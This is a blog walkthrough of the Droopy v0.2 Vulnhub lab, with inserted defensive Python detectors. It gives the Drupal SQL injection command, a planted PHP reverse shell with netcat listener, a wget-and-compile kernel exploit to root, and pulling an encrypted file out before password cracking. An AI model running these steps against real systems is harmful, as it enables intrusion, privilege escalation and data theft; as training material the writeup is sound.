Posted in Penetration Testing, web app testing

Droopy v0.2 Vulnhub Writeup

I’ve been working on this epic VM for a day now. I am using Vulnhub to get a feel for how the labs are in the OSCP course/exam. I won’t lie: I did look up a few tutorials just to get a feel for how it all went, as I was totally clueless as to how to attack this one. However, most of the tutorials left out big chunks of how to do this and most of my time was spent ironing out the creases. Whether that was deliberate on the part of the tutorial authors remains to be seen.

This is a big one and the amount I’ve learned from this has been amazing.

Droopy v0.2 VM

After having some grim issues with VirtualBox, I set about port scanning with nmap.

[Image: nmapScan]

I see that on port 80 we have Drupal 7. I went straight to my browser and opened the IP address of the server.

[Image: Website]

I looked over a few tutorials on how to attack Drupal 7 and found that a lot of the links were dead or the scripts just gave me errors. I went to Exploit-DB and searched around for a bit. This particular version of Drupal was vulnerable to an SQL injection that created an admin account. Exploit-DB gave details of a Python script called ‘drupalSQLi.py’ that could do just the job; however, it gave a few errors on running. I googled ‘drupalSqli.py’ and found it on this site:

https://www.homelab.it/index.php/2014/10/17/drupal-7-sql-injection/

After I downloaded the script, unpacked it and the like, I ran this in the terminal:

python drupalsqli.py -t IPADDRESS -u admin -p admin

[Image: pythonSQLi]

SUCCESS!!

[Image: GotAdmin]

I logged in with my newly created credentials. Some tutorials mentioned that you had to enable the ‘PHP Filter’ module; some then went off on a path I was unfamiliar with.

[Image: phpfilter]

After saving this setting change, I went back into the Module settings and changed something else.

[Image: phpCodeText]

This setting allows the body of a post to be treated as PHP code. After a few attempts, this was my conclusion.

I already had the ‘ReversePHPShell.PHP’ file from PentestMonkey, so I created a new post and pasted the PHP code into the text field, called it ‘test’ and saved the blog post.

Be sure to edit the call-back IP address in the reverse PHP code to your own box’s IP.

I created a netcat listener:

nc -lnvp 1234

I refreshed the homepage of the website and got a shell.

[Image: netcat]

Most people carried on working in this raw shell after this point. One person gave a good tip that I found really useful: running the Python snippet below turns the shell into a familiar Bash-style terminal.

[Image: pythonBash]

It’s handy because the prompt lets you know where you are at any one time. It’s actually useful later.
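From the defender’s side, the interesting artefact in the steps above is a shell running as the web server’s user with a web server process as its ancestor. The following script is an added example (mine, not part of the writeup or of any tool it mentions): it parses a process listing in the shape of `ps -eo pid,ppid,user,args`, walks each process’s parent chain, and reports interpreters or shells that descend from a web server worker. The listing, the `WEB_USERS`, `WEB_SERVERS` and `SHELLS` sets and the function names are all my own constructions; a one-shot `sh -c` under PHP is treated as normal, since `exec()` and `system()` produce those routinely.

```python
"""Detect interactive shells spawned under a web-server worker.

Added example (not from the writeup). The process snapshot below is
constructed to mimic `ps -eo pid,ppid,user,args` output on a host where
a PHP page has called back to a listener and the shell was upgraded
with a pty.
"""
import re

WEB_USERS = {"www-data", "apache", "nginx"}           # assumed web-user names
WEB_SERVERS = {"apache2", "httpd", "php-fpm", "nginx"}  # assumed server binaries
SHELLS = {"sh", "bash", "dash", "python", "python3", "perl", "nc", "ncat"}

# Constructed sample: header row, then one process per line.
SAMPLE_PS = """\
  PID  PPID USER     COMMAND
    1     0 root     /sbin/init
  812     1 root     /usr/sbin/apache2 -k start
  903   812 www-data /usr/sbin/apache2 -k start
  904   812 www-data /usr/sbin/apache2 -k start
 1240   903 www-data sh -c uname -a
 1241   904 www-data /bin/sh -i
 1242  1241 www-data python -c import pty; pty.spawn("/bin/bash")
 1243  1242 www-data /bin/bash
 1300     1 root     /usr/sbin/sshd -D
 1350  1300 dave     -bash
"""


def parse_ps(text):
    """Parse ps-style text into {pid: (ppid, user, argv0, full args)}."""
    procs = {}
    for line in text.splitlines()[1:]:          # skip the header row
        pid, ppid, user, args = line.split(None, 3)
        argv0 = args.split()[0].rsplit("/", 1)[-1]   # basename of the program
        procs[int(pid)] = (int(ppid), user, argv0, args)
    return procs


def ancestors(procs, pid):
    """Yield (pid, user, argv0) for each ancestor of pid, nearest first."""
    seen = set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        ppid = procs[pid][0]
        pid = ppid
        if pid in procs:
            yield pid, procs[pid][1], procs[pid][2]


def find_webshell_candidates(procs):
    """Return pids of shells/interpreters descended from a web-server worker.

    A plain `sh -c cmd` is normal for PHP's exec()/system(); what we flag is
    an interactive shell (-i), a pty being spawned, or a shell whose own
    parent is already a shell under the web user (a nested chain).
    """
    hits = []
    for pid, (ppid, user, argv0, args) in sorted(procs.items()):
        if user not in WEB_USERS or argv0 not in SHELLS:
            continue
        if not any(a0 in WEB_SERVERS for _, _, a0 in ancestors(procs, pid)):
            continue
        interactive = re.search(r"(^|\s)-i(\s|$)", args) is not None
        pty_spawn = "pty" in args
        parent_is_shell = ppid in procs and procs[ppid][2] in SHELLS
        if interactive or pty_spawn or parent_is_shell:
            hits.append(pid)
    return hits


if __name__ == "__main__":
    table = parse_ps(SAMPLE_PS)
    for pid in find_webshell_candidates(table):
        print(f"suspicious: pid {pid} -> {table[pid][3]}")
```

On the constructed snapshot this reports pids 1241, 1242 and 1243 and stays quiet about the `sh -c uname -a` worker and the SSH session. On a live box you would feed it the real `ps` output; the same ancestry logic is what endpoint agents apply to "web server spawns shell" rules.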

Now we need to get ROOT

We are currently in a shell as a normal user. How do we get root from here? By this point I was still kind of following the tutorial and filling in the blanks as I went. I knew it wasn’t going to be straightforward, and it wasn’t.

We need to change directory to a writable folder:

cd /tmp/

Some tutorials talked about Ubuntu 14.04 being vulnerable to a privilege escalation exploit written in C. I spent a large portion of my time trying to get this to work, as it wasn’t clear in any of the tutorials.

In the /tmp/ directory, while still in the shell on the server, type this command in:

wget https://www.exploit-db.com/download/37292

Once you have downloaded the 37292 file you need to do something that every tutorial leaves out: add a file extension.

mv 37292 37292.c

I received no end of errors trying to compile that 37292 file until I did the above step.

Now that we have a recognised ‘C’ file we can compile it. The image below details the steps taken.

[Image: PrivEsc]

In essence we did this:

  • downloaded the 37292 file
  • renamed it 37292.c
  • compiled it using gcc and output it as privesc
  • made it executable using chmod +x
  • ran it with ./privesc
  • a quick ‘whoami’ shows us as ‘root’
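Three things had to line up for that chain to work: a world-writable directory the web user could execute from, a tool to fetch the source, and a compiler already on the box. The script below is an added example of mine (not from the writeup) that audits those conditions: it reads mount options from `/proc/mounts`-formatted text and checks which build and download tools resolve on PATH. The mount table is constructed; `HARDENING_OPTS` and `BUILD_TOOLS` are my own lists, and `shutil.which` is the standard-library lookup.

```python
"""Audit the conditions a download-compile-run escalation relies on.

Added example (not from the writeup). Parses /proc/mounts-style text to
see whether /tmp is mounted noexec/nosuid/nodev, and lists which
compilers and fetch tools are reachable by the current user.
"""
import shutil

# Constructed /proc/mounts excerpt: /tmp has nosuid,nodev but not noexec.
SAMPLE_MOUNTS = """\
/dev/sda1 / ext4 rw,relatime,errors=remount-ro 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev,noexec 0 0
"""

HARDENING_OPTS = ("noexec", "nosuid", "nodev")   # options we expect on scratch dirs
BUILD_TOOLS = ("gcc", "cc", "make", "wget", "curl")  # tools worth knowing about


def parse_mounts(text):
    """Return {mountpoint: set(options)} from /proc/mounts-formatted lines."""
    table = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        table[fields[1]] = set(fields[3].split(","))
    return table


def missing_hardening(mounts, path="/tmp"):
    """List hardening options absent from the mount that covers `path`.

    If `path` is not its own mount point, the longest parent mount wins
    (e.g. /tmp living on the root filesystem).
    """
    best = ""
    for mp in mounts:
        covers = path == mp or path.startswith(mp.rstrip("/") + "/")
        if covers and len(mp) > len(best):
            best = mp
    opts = mounts.get(best, set())
    return [o for o in HARDENING_OPTS if o not in opts]


def tools_on_path(names=BUILD_TOOLS):
    """Return which build/download tools resolve on PATH (live check)."""
    return [n for n in names if shutil.which(n)]


if __name__ == "__main__":
    gaps = missing_hardening(parse_mounts(SAMPLE_MOUNTS), "/tmp")
    print("/tmp lacks:", ", ".join(gaps) or "nothing")
    print("tools available to this user:", tools_on_path())
    if "noexec" in gaps and "gcc" in tools_on_path():
        print("finding: a low-privileged user can build and run code from /tmp")
```

Mount options and removing compilers only raise the bar; the step the writeup describes works because the kernel itself was unpatched, so the real remedy is keeping Ubuntu 14.04 hosts updated. The audit is still worth running, because it is the cheap control that turns a one-command escalation into a noisy, multi-step one.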

YAAY! ROOT

Sadly, this is where a lot of the still-live tutorials stopped. They got root and that was the end of it. According to the VM spec there was a flag we had to find. A couple of people went further but they weren’t too open about how it was done. Again, this could be deliberate, so I had to investigate further.

In the root directory there is a file ‘dave.tc’. On further investigation this is a TrueCrypt file: TrueCrypt is software that encrypts drives and file systems and is no longer supported or maintained. Hmm. A few authors used ‘TrueCrack’ to crack the encrypted ‘dave.tc’ file system. However, there are some things we need to do first.

Rockyou.txt & emails

Some authors glossed over the fact that you could navigate to /var/mail/ and read the email hint that was left on the server. In fact you had to ‘cat www-data’ to read the email hint.

cat www-data

[Image: email]

When you’re learning pen testing, you use the ‘rockyou.txt’ wordlist file a lot when brute forcing the logins created for us n00bs. It was the first thing that popped out at me when I read this hint.

By this point all the tutorials tell you to grep a file and output the contents to a new file for use later. Following these tutorials will have your next step fail. Here are the steps to take. Navigate to:

/usr/share/wordlists/

Enter this command:

grep "academy" rockyou.txt | cut -d ":" -f2 > /root/rockacad.txt

This command is different from the one in all the tutorials, as it pulls only the passwords out of the rockyou.txt file. If you follow the other tutorials you will end up with a file whose lines look like this:

username:password

This will fail in the TrueCrack attempt. The above grep command searches the file for anything related to ‘academy’ and keeps only the right-hand column, where the delimiter is ‘:’.

It took me a few attempts to figure out why the TrueCrack command was failing.

dave.tc

We’re still not in the clear. We can’t run ‘TrueCrack’ in the shell, so we need to get the ‘dave.tc’ file onto our local system to crack it.

After a few failed attempts I found a working solution.

mv dave.tc /var/www/sites/html/

This moves the ‘dave.tc’ file into the root of the website, so we can use ‘wget’ in a local terminal to grab the file.

Now in a separate terminal window (CTRL+ALT+T) we can run:

wget http://<ip address of site>/dave.tc

This runs and we get a copy of ‘dave.tc’ in our current working directory.
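Staging a file in the document root so it can be pulled over HTTP is exactly the kind of change a web root integrity check is meant to catch. The script below is an added example of mine, not part of the writeup: it snapshots a directory as path-to-SHA-256, diffs two snapshots, and ranks the findings so that archives and encrypted containers (I included `.tc` for TrueCrypt) and new or changed PHP files come first. The two snapshots and the `/var/www/html` path are constructed for the demo; `snapshot()` walks a real directory.

```python
"""Flag files that appear in or change under the web root.

Added example (not from the writeup). A baseline snapshot taken after
deployment, compared against a fresh one, surfaces a container dropped
into the document root as well as edited or newly added PHP scripts.
"""
import hashlib
import os

# Extensions that do not belong in a Drupal/static document root (my list).
SUSPECT_EXT = {".tc", ".hc", ".zip", ".tar", ".gz", ".7z", ".sql", ".bak"}
SCRIPT_EXT = {".php", ".phtml"}


def snapshot(root):
    """Map relative path -> sha256 hex digest for every file under root."""
    result = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            result[os.path.relpath(full, root)] = digest
    return result


def compare(baseline, current):
    """Return (added, modified, removed) relative paths between snapshots."""
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    modified = sorted(p for p in current
                      if p in baseline and current[p] != baseline[p])
    return added, modified, removed


def triage(added, modified):
    """Rank findings: containers/archives and PHP changes are HIGH."""
    findings = []
    for p in added:
        ext = os.path.splitext(p)[1].lower()
        if ext in SUSPECT_EXT:
            findings.append(("HIGH", p, "non-web file staged in document root"))
        elif ext in SCRIPT_EXT:
            findings.append(("HIGH", p, "new executable script"))
        else:
            findings.append(("INFO", p, "new file"))
    for p in modified:
        ext = os.path.splitext(p)[1].lower()
        sev = "HIGH" if ext in SCRIPT_EXT else "MEDIUM"
        findings.append((sev, p, "content changed since baseline"))
    return findings


# Constructed snapshots standing in for two runs of snapshot("/var/www/html").
BASELINE = {
    "index.php": "a" * 64,
    "sites/default/settings.php": "b" * 64,
    "misc/drupal.js": "c" * 64,
}
CURRENT = {
    "index.php": "a" * 64,
    "sites/default/settings.php": "d" * 64,   # edited since deployment
    "misc/drupal.js": "c" * 64,
    "dave.tc": "e" * 64,                      # container staged for download
    "robots.txt": "f" * 64,
}


def demo():
    """Diff the constructed snapshots and return (findings, removed)."""
    added, modified, removed = compare(BASELINE, CURRENT)
    return triage(added, modified), removed


if __name__ == "__main__":
    for sev, path, why in demo()[0]:
        print(f"{sev:6} {path}: {why}")
```

In practice you would store the baseline outside the web root (or off-host), run the comparison from cron, and alert on anything HIGH; the same diff also catches the PHP-filter post from earlier if the node body is rendered to disk by a cache.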

TrueCrack

TrueCrack will attempt to crack ‘TrueCrypt’ files with a given wordlist. Knowing that our earlier wordlist work should be useful given the email hint, let’s give it a crack.

[Image: truecrack]

As the image shows, we’ve cracked the password for the ‘dave.tc’ encrypted file system.

The password was ‘eatonacademy’. The command used was:

truecrack --truecrypt ./dave.tc --key sha512 --wordlist rockacad.txt

VeraCrypt

Since TrueCrypt isn’t easily available I had to search for an alternative. VeraCrypt seemed like a good idea. I installed it, decrypted the drive, mounted it and searched through the directories. Some are hidden; however, at this stage I don’t want to give the whole game away, but it’s fairly easy after you’ve mounted the drive.

The result?

[Image: Flag]

There was a lot of gap filling in this one, and I’m glad people leave things out of tutorials. It makes you think more and it edges you closer on your own.

But you got some help?

Vulnhub has been an amazing place to play. The VMs are nothing like Metasploitable 2, static websites or live boxes. They are designed to make you think. I needed to break out of the prescribed path for trainees. Sometimes you just need to look up tutorials to get a hint for a step. The lessons I’ve learned doing these Vulnhub VMs will certainly be useful at some point. Documenting the progress will be a reference point for later use.


Thanks!!

Thanks to Vulnhub for hosting the VM and to knightmare for creating it.
